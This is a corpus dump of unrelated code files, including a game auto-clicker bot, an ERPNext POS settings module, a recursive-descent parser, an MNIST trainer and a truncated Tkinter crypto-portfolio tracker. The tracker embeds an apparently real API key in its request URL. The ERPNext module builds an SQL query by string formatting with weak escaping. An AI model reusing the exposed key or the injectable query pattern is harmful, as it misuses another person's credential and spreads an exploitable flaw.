+{"seq_id":"415675423","text":"import cv2, glob, time, pyautogui, enum, numpy\n\nclass Template(enum.Enum):\n COIN=\"img/templates/coin*.png\"\n PLOT=\"img/templates/plot*.png\"\n SHOVEL=\"img/templates/shovel*.png\"\n HARVEST=\"img/templates/harvest_all*.png\"\n OK=\"img/templates/ok*.png\"\n CENTER=\"img/templates/center*.png\"\n POTATO=\"img/templates/potato*.png\"\n WHEAT=\"img/templates/wheat*.png\"\n CORN=\"img/templates/corn*.png\"\n\nTHRESHOLD = 0.6\nDELAY_PER_CLICK = 0.5\nCROP = Template.CORN\nPLOT_COUNT = 5\n\ndef click(p):\n x,y = p\n pyautogui.click(x, y)\n time.sleep(DELAY_PER_CLICK)\n\ndef collect_coins():\n coins = detect(Template.COIN)\n for coin in coins:\n click(coin)\n\ndef handle_message():\n message = detect(Template.OK)\n if message:\n click(message[0])\n\ndef plant_crops():\n plots = detect(Template.PLOT)\n if plots:\n click(plots[0])\n time.sleep(2)\n crop = detect(CROP)\n if crop:\n for i in range(PLOT_COUNT):\n click((crop[0][0] + 50, crop[0][1] + 120))\n\ndef go_to_center():\n center = detect(Template.CENTER)\n if center:\n click(center[0])\n\ndef harvest_crops():\n shovel = detect(Template.SHOVEL)\n if shovel:\n click((shovel[0][0], shovel[0][1] + 70))\n harvest = detect(Template.HARVEST)\n if harvest: \n click(harvest[0])\n\ndef detect(template):\n template_path = template.value\n large_image = pyautogui.screenshot()\n large_image = cv2.cvtColor(numpy.array(large_image), cv2.COLOR_RGB2BGR)\n\n # Get matched objects\n matches = []\n for file in glob.glob(template_path):\n small_image = cv2.imread(file)\n height, width = small_image.shape[:-1]\n\n result = cv2.matchTemplate(large_image, small_image, cv2.TM_CCOEFF_NORMED)\n\n locations = numpy.where(result >= THRESHOLD)\n\n matches += zip(*locations[::-1])\n\n # Combine overlapping matched objects\n results = []\n mask = numpy.zeros(large_image.shape[:-1], numpy.uint8)\n\n for match in matches:\n if mask[match[1] + height//2, match[0] + width//2] != 255:\n mask[match[1]:match[1] + height, match[0]:match[0] + width] = 255\n center = (match[0] + width//2, match[1] + height//2)\n results.append(center)\n print(f'Found {template.name.lower()} at {center}.')\n\n return results\n\nwhile(True):\n collect_coins()\n harvest_crops()\n plant_crops()\n go_to_center()\n handle_message()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"16281610","text":"# File: sunburst_csv_converter.py\n# Author: Eric Gronda\n# Date: 6/22/18\n# Description:\n# \t\tConverts nodes_classified.csv to json format for \n#\t\tcombatibility with sunburst diagram\n# References:\n#\t\tUser \"Hett\"'s comment on: \n#\t\thttps://stackoverflow.com/questions/43757965/convert-csv-to-json-tree-structure\n\n########################################################################################\n#\tWant to make a sunburst diagram that \n#\n#\tFINAL OUTPUT:\n#\n#\t\tnode -> { name, value, children }\n#\t\tchildren -> [ nodes ]\n\nimport sys\nimport csv\nfrom collections import defaultdict\n\n\ndef ctree():\n\t\"\"\" One of the python gems. Making possible to have dynamic tree structure.\n\n\t\"\"\"\n\treturn defaultdict(ctree)\n\n\ndef build_leaf(name, leaf):\n\t\"\"\" Recursive function to build desired custom tree structure\n\n\t\"\"\"\n\tres = {\"name\": name}\n\t# add children node if the leaf actually has any children\n\tif len(leaf.keys()) > 0:\n\t\tres[\"children\"] = [build_leaf(k, v) for k, v in leaf.items()]\n\t\n\t# set a size for the nodes\n\telse:\n\t\tres[\"size\"] = 1 # 1 person per node\n\t\n\n\treturn res\n\ndef readIn():\n\n\t# make an array of data to return\n\tdata = []\n\n\t# sequences by week (place weekNum between fileProto and fileProtoEnd)\n\tfileProto = \"../../../Raw_data_processing_JSON_to_CSV/sequence\"\n\tfileProtoEnd = \".txt\"\n\n\tweekNum = 0\t\n\tif(sys.argv[1]):\n\t\tweekNum = sys.argv[1]\n\telse:\n\t\tweekNum = -1\n\n\tfileName = fileProto + weekNum + fileProtoEnd\n\n\tif weekNum != -1:\n\t\n\t\t# open file\n\t\twith open(fileName) as ifp:\n\n\t\t\t#data.append( { str(weekNum) : [] } )\n\t\t\tweek = csv.reader(ifp)\n\t\t\n\t\t\tfor student in week:\n\t\t\t\n\t\t\t\t# split student sequences\n\t\t\t\tstudentSeq = student[0].split(' ')\n\t\t\t\tdata.append( studentSeq[ 1 : len(studentSeq) - 1] )\n\n\t\treturn data\n\n\telse:\n\t\treturn -1\n\n\ndef writeOut( data ):\n\t\"\"\" The main thread composed from two parts.\n\n\tFirst it's parsing the csv file and builds a tree hierarchy from it.\n\tSecond it's recursively iterating over the tree and building custom\n\tjson-like structure (via dict).\n\n\tAnd the last part is just printing the result.\n\n\t\"\"\"\n\ttree = ctree()\n\n\tfor rid, row in enumerate(data):\n\n\t\t# skipping first header row. 
remove this logic if your csv is\n\t\t# headerless\n\t\tif rid == 0:\n\t\t\tcontinue\n\n\t\t# usage of python magic to construct dynamic tree structure and\n\t\t# basically grouping csv values under their parents\n\t\tleaf = tree[row[0]]\n\t\tfor cid in range(1, len(row)):\n\t\t\tleaf = leaf[row[cid]]\n\n\t# building a custom tree structure\n\tres = []\n\tfor name, leaf in tree.items():\n\t\tres.append(build_leaf(name, leaf))\n\n\t\n\t# adding root node\n\tres = { \"name\":\"root\" , \"children\":res }\n\n\n\t# outputs to json file\n\t# makes student sequence file\n\timport json\n\t\t\n\tfileName = \"student_seq_week/student_seq_week_\" + str(sys.argv[1]) + \".json\"\n\n\twith open(fileName, 'w') as outfile:\n\t\tjson.dump(res, outfile)\n\n\t\n\ndef main( ):\n\n\t# error prevention\n\tif(not sys.argv[1]):\n\t\tprint(\"Please enter a file tag as second argument\")\n\t\treturn 0\n\n\t# Read in and write out the data from a csv\n\twriteOut( readIn() )\n\n\t\n# so let's roll\nmain()\n","sub_path":"d3js_projects/sunburst/csv_converter_sunburst/sunburst_data_converter_student.py","file_name":"sunburst_data_converter_student.py","file_ext":"py","file_size_in_byte":3014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"56684442","text":"# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors\n# License: GNU General Public License v3. See license.txt\n\nfrom __future__ import unicode_literals\nimport frappe\nfrom frappe import msgprint, _\nfrom frappe.utils import cint\n\nfrom frappe.model.document import Document\n\nclass POSSetting(Document):\n\tdef validate(self):\n\t\tself.check_for_duplicate()\n\t\tself.validate_expense_account()\n\t\tself.validate_all_link_fields()\n\n\tdef check_for_duplicate(self):\n\t\tres = frappe.db.sql(\"\"\"select name, user from `tabPOS Setting`\n\t\t\twhere ifnull(user, '') = %s and name != %s and company = %s\"\"\",\n\t\t\t(self.user, self.name, self.company))\n\t\tif res:\n\t\t\tif res[0][1]:\n\t\t\t\tmsgprint(_(\"POS Setting {0} already created for user: {1} and company {2}\").format(res[0][0],\n\t\t\t\t\tres[0][1], self.company), raise_exception=1)\n\t\t\telse:\n\t\t\t\tmsgprint(_(\"Global POS Setting {0} already created for company {1}\").format(res[0][0],\n\t\t\t\t\tself.company), raise_exception=1)\n\n\tdef validate_expense_account(self):\n\t\tif cint(frappe.defaults.get_global_default(\"auto_accounting_for_stock\")) \\\n\t\t\t\tand not self.expense_account:\n\t\t\tmsgprint(_(\"Expense Account is mandatory\"), raise_exception=1)\n\n\tdef validate_all_link_fields(self):\n\t\taccounts = {\"Account\": [self.cash_bank_account, self.income_account,\n\t\t\tself.expense_account], \"Cost Center\": [self.cost_center],\n\t\t\t\"Warehouse\": [self.warehouse]}\n\n\t\tfor link_dt, dn_list in accounts.items():\n\t\t\tfor link_dn in dn_list:\n\t\t\t\tif link_dn and not frappe.db.exists({\"doctype\": link_dt,\n\t\t\t\t\t\t\"company\": self.company, \"name\": link_dn}):\n\t\t\t\t\tfrappe.throw(_(\"{0} does not belong to Company {1}\").format(link_dn, self.company))\n\n\tdef on_update(self):\n\t\tself.set_defaults()\n\n\tdef on_trash(self):\n\t\tself.set_defaults(include_current_pos=False)\n\n\tdef set_defaults(self, include_current_pos=True):\n\t\tfrappe.defaults.clear_default(\"is_pos\")\n\n\t\tif not include_current_pos:\n\t\t\tcondition = \" where name != '%s'\" % self.name.replace(\"'\", \"\\'\")\n\t\telse:\n\t\t\tcondition = \"\"\n\n\t\tpos_view_users = frappe.db.sql_list(\"\"\"select user\n\t\t\tfrom `tabPOS Setting` {0}\"\"\".format(condition))\n\n\t\tfor user in pos_view_users:\n\t\t\tif user:\n\t\t\t\tfrappe.defaults.set_user_default(\"is_pos\", 1, user)\n\t\t\telse:\n\t\t\t\tfrappe.defaults.set_global_default(\"is_pos\", 1)\n\n@frappe.whitelist()\ndef get_series():\n\treturn frappe.get_meta(\"Sales Invoice\").get_field(\"naming_series\").options or \"\"\n","sub_path":"python/erpnext/2015/4/pos_setting.py","file_name":"pos_setting.py","file_ext":"py","file_size_in_byte":2364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"272562311","text":"'''\nProblem Statement: implement an algorithm to find kth element to last\n\nexplantation: 3rd element to last means: last lement: 1st --> last second: 2nd --> element before --> 3rd (return this one)\nexample: Linked list: 1 --> 2 --> 3 --> 4 --> 5 --> 6 --> 7 --> 8 --> 9 --> 10 --> 11 --> 12\nK = 4 {element retruned here is 8}\n\n\nSolution:\nMethod 1: using 2 pointer method (Pointers p and q)\nsteps:\n1) intialize pointer q at kth node\n2) initialize pointer p at head\n3) till q pointer reaches last node: traverse both p and q pointers\n4) now q pointer is at last node while p is at kth element\n\n\nMethod 2:\nwe can keep a count of nodes when populating linked list, and then just traverse to kth node\n\n'''\n\n\nclass Node:\n def __init__(self,data):\n self.data = data #intialize data\n self.next = None #default next pointer is set to none\n\n\nclass SLL:\n\n #initialize head with None\n def __init__(self):\n self.head = None\n self.count = 0\n\n def print_list(self):\n temp = self.head\n\n while(temp != None):\n print(temp.data, end='--->')\n temp = temp.next\n\n def kth_to_last(self,k):\n '''\n\n :param k: position k\n :return: kth node data\n '''\n count = 0\n end1 = self.head \n start = self.head\n \n #intialize pointer end1 to kth node\n while(count < k):\n count += 1\n #print(count, end1.data)\n\n if end1 != None:\n end1 = end1.next\n\n else:\n print('Linked list has less than',k,' elements')\n return\n #print(count)\n\n #traverse: end pointer to last node, start pointer to kth node\n while(end1 != None):\n end1 = end1.next\n\n start = start.next\n\n return(start.data)\n\n\n\n\n\n def insert_first(self,data):\n self.count += 1\n node = Node(data)\n\n\n if self.head == None:\n self.head = node\n return\n\n node.next = self.head\n self.head = node\n\n\n def insert_end(self,data):\n self.count += 1\n\n node = Node(data)\n\n if self.head == None:\n self.head = node\n return\n\n else:\n temp = self.head\n while (temp.next != None):\n temp = temp.next\n temp.next = node\n\n\n\n\nif __name__=='__main__':\n obj = SLL()\n \n #populate linked list\n obj.insert_first(1)\n obj.insert_end(2)\n obj.insert_end(3)\n obj.insert_end(4)\n obj.insert_end(5)\n obj.insert_end(6)\n obj.insert_end(7)\n obj.insert_end(8)\n obj.insert_end(9)\n obj.insert_end(10)\n obj.insert_end(11)\n obj.insert_end(12)\n\n\n print('linked list')\n obj.print_list()\n\n \n element = obj.kth_to_last(12)\n print(element)\n\n\n","sub_path":"Linked-List/CTCI-Chapter02-Q2-return_kth_to_last.py","file_name":"CTCI-Chapter02-Q2-return_kth_to_last.py","file_ext":"py","file_size_in_byte":2821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"597862874","text":"from django.test import TestCase\n\nfrom .model_instances import create_comment\nfrom ..forms import CommentForm\n\n\nclass TestCommentForm(TestCase):\n @classmethod\n def setUpTestData(cls):\n cls.obj = create_comment()\n cls.form = CommentForm\n\n def test_form_with_no_data(self):\n self.assertFalse(self.form(data={}).is_valid(),\n 'Should be invalid if no data is given')\n\n def test_valid_form(self):\n data = {'body': 'Lorem ipsum...'}\n self.assertTrue(CommentForm(data=data).is_valid(),\n 'Should be valid with all data')\n","sub_path":"group_site/news/tests/test_forms.py","file_name":"test_forms.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"41158929","text":"# -*- coding: utf-8 -*-\n# @Author: SmokedInk\n# @Title: settings\n# @Time: 2019-12-10 13:37:07\n# @Desc: 配置文件\n\nimport os\n\n\n# 项目根目录\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\n# 服务器调试模式, 值为False时不自动重启服务器\nDEBUG = False\n\n# 变更自动重启\nAUTORELOAD = False\n\n# cookie secret key\nCOOKIE_SECRET = '{cookie_secret}'\n\n# 是否开启csrf攻击防范\nXSRF_COOKIES = False\n\n# 允许访问的HOST配置\nALLOWED_HOSTS = []\n\n# 模块配置\nMODULES = [\n # \"swagger\",\n]\n\n# 命令配置\nCOMMANDS = []\n\n# 数据库配置\nDATABASES = {\n 'mongodb': {\n \"host\": 'localhost',\n \"port\": 27017\n }\n}\n\n# 缓存\nCACHES = {}\n\n# 静态文件目录\nSTATIC = \"\"\n\n# 模板文件目录\nTEMPLATE = \"\"\n\n# 算法模型目录\nDATA = \"\"\n\nPAGE_SIZE = 10\n\nPAGE_SHOW = 10\n","sub_path":"config/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"22219859","text":"from tokens import *\nfrom ast import *\n\n#morao sam da reimenujem file jer python ima built-in module parser, posle sat vremena debug-a -.-\n\nclass Parser(object):\n\n \"\"\"\n Gramatika:\n \n program -> compound_statement TACKA\n \n compound_statement -> BEGIN statement_list END\n \n statement_list -> statement | statement SEMI statement_list\n \n statement -> compound_statement | assign_statement | empty\n \n empty ->\n \n assign_statement -> promenljiva ASSIGN izraz\n \n izraz -> term ((PLUS | MINUS) term)*\n \n term -> faktor ((PUTA | PODELJENO) faktor)*\n \n faktor -> (PLUS | MINUS) faktor | INTEGER | LZ izraz DZ | promenljiva\n \n promenljiva -> ID\n \n \"\"\"\n\n def __init__(self,lexer):\n self.lexer = lexer\n self.trenutni_token = self.lexer.next_token() #inicijalizacija prvog tokena\n\n def greska(self):\n raise Exception('Greska pri parsiranju na {}.'.format(self.trenutni_token))\n\n\n def move(self,token):\n \"\"\"\n Pomera se na sledeci token.\n :param token: tip trenutnog tokena\n \"\"\"\n if self.trenutni_token.tip == token:\n self.trenutni_token = self.lexer.next_token()\n else:\n self.greska()\n\n def program(self):\n \"\"\"\n program pravilo gramatike.\n Glavna funkcija koja vraca parsno stablo.\n :return: AST root\n \"\"\"\n\n cvor = self.compound_statement()\n self.move(TACKA)\n return cvor\n\n def compound_statement(self):\n \"\"\"\n compound_statement pravilo gramatike impl.\n Vraca Compound cvor koji sadrzi listu statement-a.\n :return: Compound node\n \"\"\"\n\n self.move(BEGIN)\n stmt_list = self.statement_list()\n self.move(END)\n\n koren = Compound()\n\n for stmt in stmt_list:\n koren.deca.append(stmt)\n\n return koren\n\n def statement_list(self):\n \"\"\"\n statement_list pravilo gramatike impl.\n Vraca listu statement-a u okviru jednog begin-end bloka.\n :return: statement list\n \"\"\"\n\n lista = [self.statement()]\n\n while self.trenutni_token.tip == SEMI:\n self.move(SEMI)\n lista.append(self.statement())\n\n return lista\n\n def statement(self):\n \"\"\"\n statement pravilo gramatike impl.\n Vraca cvor(compound, assign ili empty)\n \"\"\"\n\n if self.trenutni_token.tip == BEGIN:\n cvor = self.compound_statement()\n elif self.trenutni_token.tip == ID:\n cvor = self.assign_statement()\n else:\n cvor = self.empty()\n\n return cvor\n\n def assign_statement(self):\n \"\"\"\n assign_statement pravilo gramatike impl.\n Vraca cvor tipa Assign(ex. a := 5)\n :return: Assign Node\n \"\"\"\n\n var = self.promenljiva()\n token = self.trenutni_token\n self.move(ASSIGN)\n izraz = self.izraz()\n\n return Assign(var,token,izraz)\n\n def promenljiva(self):\n \"\"\"\n promenljiva pravilo gramatike impl.\n Vraca cvor tipa Var\n :return: Var Node\n \"\"\"\n\n cvor = Var(self.trenutni_token)\n self.move(ID)\n return cvor\n\n def empty(self):\n \"\"\"\n empty pravilo gramatike impl.\n Vraca NoOp cvor(ex 'BEGIN END.' 
    def faktor(self):\n        \"\"\"\n        Implements the 'faktor' grammar rule.\n        :return: a UnarnaOperacija (unary op) node,\n        a Broj (number) node, or the root of a subtree representing an 'izraz'\n        \"\"\"\n        token = self.trenutni_token\n        if token.tip == PLUS:\n            self.move(PLUS)\n            return UnarnaOperacija(token,self.faktor())\n        elif token.tip == MINUS:\n            self.move(MINUS)\n            return UnarnaOperacija(token,self.faktor())\n        elif token.tip == INTEGER:\n            self.move(INTEGER)\n            return Broj(token)\n        elif token.tip == LZ:\n            self.move(LZ)\n            cvor = self.izraz()\n            self.move(DZ)\n            return cvor\n        elif token.tip == ID:\n            return self.promenljiva()\n        else:\n            self.greska() # previously fell through and silently returned None on an unexpected token\n\n    def term(self):\n        \"\"\"\n        Implements the 'term' grammar rule.\n        :return: root of the subtree representing a 'term'\n        \"\"\"\n\n        cvor = self.faktor()\n\n        while self.trenutni_token.tip == PUTA or self.trenutni_token.tip == PODELJENO:\n            token = self.trenutni_token\n            if token.tip == PUTA:\n                self.move(PUTA)\n            else:\n                self.move(PODELJENO)\n\n            cvor = BinarnaOperacija(cvor,token,self.faktor())\n\n        return cvor\n\n    def izraz(self):\n        \"\"\"\n        Implements the 'izraz' (expression) grammar rule.\n        :return: root of the subtree representing an 'izraz'\n        \"\"\"\n\n        cvor = self.term()\n\n        while self.trenutni_token.tip == PLUS or self.trenutni_token.tip == MINUS:\n            token = self.trenutni_token\n            if token.tip == PLUS:\n                self.move(PLUS)\n            else:\n                self.move(MINUS)\n\n            cvor = BinarnaOperacija(cvor,token,self.term())\n\n        return cvor\n\n\n    def parse(self):\n        return self.program()","sub_path":"parse.py","file_name":"parse.py","file_ext":"py","file_size_in_byte":5277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"638891308","text":"import hashlib\nimport datetime\nfrom pprint import pprint as pp\nimport os\nimport requests\nfrom dotenv import load_dotenv\nload_dotenv()\nimport pandas as pd\n\ndef clean_header(x):\n x = x.str.strip().str.lower().str.replace(' ', '_').str.replace('(', '').str.replace(')', '').str.replace('?','')\n return x\ndef clean_nan(x):\n x = x.fillna('Unknown',inplace = True)\n return x\ndef fill_value(x,value):\n x = x.fillna(f'{value}', inplace=True)\n return x\n\ndef hash_params(alias):\n \"\"\" Marvel API requires server side API calls to include\n md5 hash of timestamp + public key + private key \"\"\"\n timestamp = datetime.datetime.now().strftime('%Y-%m-%d%H:%M:%S')\n pub_key = os.getenv('MARVEL_KEY')\n priv_key = os.getenv('MARVELP_KEY')\n \n hash_md5 = hashlib.md5()\n hash_md5.update(f'{timestamp}{priv_key}{pub_key}'.encode('utf-8'))\n hashed_params = hash_md5.hexdigest()\n try:\n\n params = {'ts': timestamp, 'apikey': pub_key, 'hash': hashed_params,'name':alias}\n res = requests.get('https://gateway.marvel.com/v1/public/characters',params=params)\n results = res.json()\n data = results['data']['results']\n personaje = pd.DataFrame(data)\n comics = dict(personaje['comics'])\n comics2 = comics[0]['items']\n comics3 = []\n for x in comics2:\n comics3.append(x['name'])\n return print('Los 20 primeros comics por orden alfabetico:',comics3)\n except:\n print('No superhero match')\n \ndef statistical_info(x):\n data = pd.read_csv('output/marvel_characters.csv')\n m = data[x].mean()\n return print('The mean is:', m)","sub_path":"src/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":1633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"129800927","text":"# https://arxiv.org/abs/1711.06104\n# models/mnist\n\nfrom pathlib import Path\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torchvision import datasets, transforms\nfrom mnistModels import MNISTmodel\n\ndef build_dataset(root, batch_size, download=False):\n train_dataset = datasets.MNIST(\n root=root, \n train=True,\n transform=transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.5,), (0.5,)) # normalize to (-1, 1)\n ]),\n download=download)\n test_dataset = datasets.MNIST(\n root=root, \n train=False,\n transform=transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.5,), (0.5,))\n ]),\n download=download)\n train_loader = torch.utils.data.DataLoader(\n train_dataset,\n batch_size=batch_size, \n shuffle=True)\n test_loader = torch.utils.data.DataLoader(\n test_dataset,\n batch_size=batch_size, \n shuffle=True)\n return train_dataset, test_dataset, train_loader, test_loader\n\ndef train(model, train_loader, optimizer, loss_function, logterm, device):\n train_loss = 0\n \n model.train()\n for i, (data, target) in enumerate(train_loader):\n data, target = data.to(device), target.to(device)\n optimizer.zero_grad()\n output = model(data)\n loss = loss_function(output, target)\n \n loss.backward()\n optimizer.step()\n \n train_loss += loss.item()\n # record\n if logterm >= 1:\n if i % logterm == 0: \n print(f\"[Log] Progress: {100*i/len(train_loader):.2f}% Batch Average loss: {loss:.4f}\")\n \n return train_loss\n\ndef test(model, test_loader, device, save_corrects=False):\n model.eval()\n test_loss = 0\n correct = 0\n with torch.no_grad():\n for data, target in test_loader:\n data, target = data.to(device), target.to(device)\n output = model(data)\n test_loss += torch.nn.functional.cross_entropy(output, target, reduction=\"sum\").item()\n pred = output.argmax(dim=1, keepdim=True)\n correct += pred.eq(target.view_as(pred)).sum().item()\n \n test_loss /= len(test_loader.dataset)\n test_acc = 100*(correct / len(test_loader.dataset))\n\n return test_loss, test_acc\n\ndef main_train(model, train_loader, test_loader, n_step, logterm, sv_path, device):\n loss_function = nn.CrossEntropyLoss()\n optimizer = optim.Adam(model.parameters())\n best_acc = 0.0\n for step in range(n_step):\n train_loss = train(model, train_loader, optimizer, loss_function, logterm, device)\n test_loss, test_acc = test(model, test_loader, device)\n print(f\"[Step] {step+1}/{n_step}\")\n print(f\"[Train] Average loss: {train_loss:.4f}\")\n print(f\"[Test] Average loss: {test_loss:.4f}, Accuracy: {test_acc:.2f}%\")\n if test_acc >= best_acc:\n best_acc = test_acc\n torch.save(model.state_dict(), sv_path)\n print(\"[Alert] best model saved\")\n print(\"----\"*10)\n return best_acc\n \ndef main(model_types, activation_types, **kwargs):\n root = kwargs[\"root\"]\n project_path = kwargs[\"project_path\"]\n logterm = kwargs[\"logterm\"]\n record_name = kwargs[\"record_name\"]\n sv_folder = kwargs[\"sv_folder\"]\n n_step = kwargs[\"n_step\"]\n batch_size = kwargs[\"batch_size\"]\n download = kwargs[\"download\"]\n device = kwargs[\"device\"]\n seed = kwargs[\"seed\"]\n \n sv_main_path = project_path/sv_folder\n if not sv_main_path.exists():\n sv_main_path.mkdir()\n record_path = project_path/\"trainlog\"/f\"{record_name}-record.txt\"\n if not record_path.exists():\n record_path.touch()\n with record_path.open(mode=\"w\", encoding=\"utf-8\") as f:\n f.write(\"| model_type | activation_type | best_acc |\\n\")\n f.write(\"|--|--|--|\\n\")\n # 
build datasets\n    *_, train_loader, test_loader = build_dataset(root, batch_size, download)\n    # start\n    for model_type in model_types:\n        for activation_type in activation_types:\n            torch.manual_seed(seed)\n            torch.cuda.manual_seed(seed)\n            print(f\"[Training {model_type}-{activation_type}] manual_seed={seed}\\n\")\n            sv_path = sv_main_path/f\"{model_type}-{activation_type}.pt\"\n            # create model\n            model = MNISTmodel(model_type, activation_type).to(device)\n            # start to train model\n            best_acc = main_train(model, train_loader, test_loader, n_step, logterm, str(sv_path), device)\n            # record best model accuracy automatically\n            with record_path.open(mode=\"a\", encoding=\"utf-8\") as f:\n                f.write(f\"|{model_type}|{activation_type}|{best_acc:.2f}%|\\n\")\n    \nif __name__ == \"__main__\":\n    \n    args = dict(\n        root = str(Path().home()/\"code\"/\"data\"),\n        project_path = Path().home()/\"code\"/\"XAI\",\n        logterm = False, \n        record_name = \"no1\",\n        sv_folder = \"trained/mnist\", \n        n_step = 20,\n        batch_size = 128,\n        download = False,\n        device = \"cuda\" if torch.cuda.is_available() else \"cpu\",\n        seed = 73\n    )\n    \n    activation_types = [\"relu\", \"tanh\", \"sigmoid\", \"softplus\"]\n    model_types = [\"dnn\", \"cnn\"]\n    main(model_types, activation_types, **args)","sub_path":"models/mnist/mnistTrain.py","file_name":"mnistTrain.py","file_ext":"py","file_size_in_byte":5390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"425576768","text":"N = int(input())\nA = list((i, j) for i, j in enumerate(map(int, input().split())))\ndictL = {}\ndictR = {}\n\nans = 0\nfor i in range(N):\n l, r = A[i][1] + A[i][0], A[i][0] - A[i][1]\n if l not in dictL:\n dictL[l] = 1\n else:\n dictL[l] += 1\n if r not in dictR:\n dictR[r] = 1\n else:\n dictR[r] += 1\n\nfor i in dictL.keys():\n if i in dictR.keys():\n ans += dictL[i] * dictR[i]\n \nprint(ans) \n","sub_path":"contest/abc166/e.py","file_name":"e.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"649654141","text":"from tkinter import *\nimport requests\nimport json\n\npycrypto=Tk()\npycrypto.title(\"My crypto Portfolio\")\npycrypto.iconbitmap('favicon.ico')\n\ndef font_color(amount):\n if amount>0:\n return \"green\"\n else:\n return \"red\"\n\ndef my_portfolio():\n\n api_request=requests.get(\"https://pro-api.coinmarketcap.com/v1/cryptocurrency/listings/latest?start=1&limit=1000&convert=USD&CMC_PRO_API_KEY=4d284c7c-947f-4a9f-8870-dfc343a74d7d\")\n \n api=json.loads(api_request.content)\n \n # print(api)\n # usage of for loop\n #coins=[\"STX\",\"BAND\",\"ZEN\",\"CHSB\"]\n \n \n coins=[{\n \"symbol\":\"BTC\",\n \"amount_owned\":380,\n \"price_per_coin\":45\n },\n {\n \"symbol\":\"BAND\",\n \"amount_owned\":8,\n \"price_per_coin\":32\n },\n {\n \"symbol\":\"ZEN\",\n \"amount_owned\":20000,\n \"price_per_coin\":45\n },\n {\n \"symbol\":\"CHSB\",\n \"amount_owned\":35,\n \"price_per_coin\":6\n },\n {\n \"symbol\":\"STX\",\n \"amount_owned\":70,\n \"price_per_coin\":5}\n ]\n \n total_pl=0\n coin_row=1\n total_current_value=0\n for i in range(0, 100):\n for coin in coins:\n if api[\"data\"][i][\"symbol\"]==coin[\"symbol\"]:\n total_paid=coin[\"amount_owned\"]*coin[\"price_per_coin\"]\n current_value=coin[\"amount_owned\"]*api[\"data\"][i][\"quote\"][\"USD\"][\"price\"]\n pl_percoin=api[\"data\"][i][\"quote\"][\"USD\"][\"price\"]-coin[\"price_per_coin\"]\n total_pl_coin=pl_percoin*coin[\"amount_owned\"]\n total_pl=total_pl+total_pl_coin\n total_current_value=total_current_value+current_value\n \n # print(api[\"data\"][i][\"name\"]+\"-\"+)\n # print(\"Price-${0:.2f}\".format(api[\"data\"][i][\"quote\"][\"USD\"][\"price\"]))\n # print(\"Number of coin:\",coin[\"amount_owned\"])\n # print(\"Toatl amount paid-\",\"{0:.2f}\".format(total_paid))\n # print(\"Current value:\",\"${0:.2f}\".format(current_value))\n # print(\"profit and Loss Per Coin:\",\"${0:.2f}\".format(pl_percoin))\n # print(\"Toatal prfit and Loss with coin:\",\"${0:.2f}\".format(total_pl_coin))\n # print(\"--------------------------------\")\n \n \n name=Label(pycrypto,text=api[\"data\"][i][\"symbol\"], bg=\"#F3F4F6\" ,fg=\"black\" ,font=\"Lato 12 bold\",padx=\"5\",pady=\"5\",borderwidth=\"0.5\",relief=\"groove\")\n name.grid(row= coin_row,column=0 ,sticky=N+S+E+W)\n \n price=Label(pycrypto,text=\"${0:.2f}\".format(api[\"data\"][i][\"quote\"][\"USD\"][\"price\"]), bg=\"#F3F4F6\" ,fg=\"black\" ,font=\"Lato 12 bold\",padx=\"5\",pady=\"5\",borderwidth=\"0.5\",relief=\"groove\")\n price.grid(row= coin_row,column=1,sticky=N+S+E+W)\n \n no_coins=Label(pycrypto,text=coin[\"amount_owned\"], bg=\"#F3F4F6\" ,fg=\"black\" ,font=\"Lato 12 bold\",padx=\"5\",pady=\"5\",borderwidth=\"0.5\",relief=\"groove\")\n no_coins.grid(row= coin_row,column=2 ,sticky=N+S+E+W)\n \n amount_paid=Label(pycrypto,text=\"${0:.2f}\".format(total_paid), bg=\"#F3F4F6\" ,fg=\"black\" ,font=\"Lato 12 bold\",padx=\"5\",pady=\"5\",borderwidth=\"0.5\",relief=\"groove\")\n amount_paid.grid(row= coin_row,column=3 ,sticky=N+S+E+W)\n \n Current_val=Label(pycrypto,text=\"${0:.2f}\".format(current_value), bg=\"#F3F4F6\" ,fg=font_color(float(\"{0:.2f}\".format(current_value))) ,font=\"Lato 12 bold\",padx=\"5\",pady=\"5\",borderwidth=\"0.5\",relief=\"groove\")\n Current_val.grid(row= coin_row,column=4 ,sticky=N+S+E+W)\n \n Pl_coin=Label(pycrypto,text=\"${0:.2f}\".format(pl_percoin), bg=\"#F3F4F6\" ,fg=font_color(float(\"{0:.2f}\".format(pl_percoin))) ,font=\"Lato 12 bold\",padx=\"5\",pady=\"5\",borderwidth=\"0.5\",relief=\"groove\")\n Pl_coin.grid(row= 
